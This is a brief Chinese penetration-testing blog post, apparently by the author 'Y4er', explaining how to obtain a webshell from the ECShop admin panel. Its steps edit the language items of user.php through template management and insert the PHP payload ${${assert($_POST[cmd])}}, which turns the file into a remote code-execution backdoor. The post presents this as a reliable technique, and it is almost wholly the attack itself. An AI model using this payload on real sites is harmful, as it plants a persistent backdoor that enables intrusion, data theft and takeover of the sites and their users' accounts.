ecshop后台拿shell Y4er • 2018年1月16日 pm8:55 • 渗透测试 • 阅读 6742 模板管理 – 语言项编辑 下拉栏选择 user.php 搜索 用户信息 后面加上代码 ${${assert($_POST[cmd])}} 确认修改 连接 根目录下 user.php 屡试不爽 原创文章,作者:Y4er,未经授权禁止转载!如若转载,请联系作者:Y4er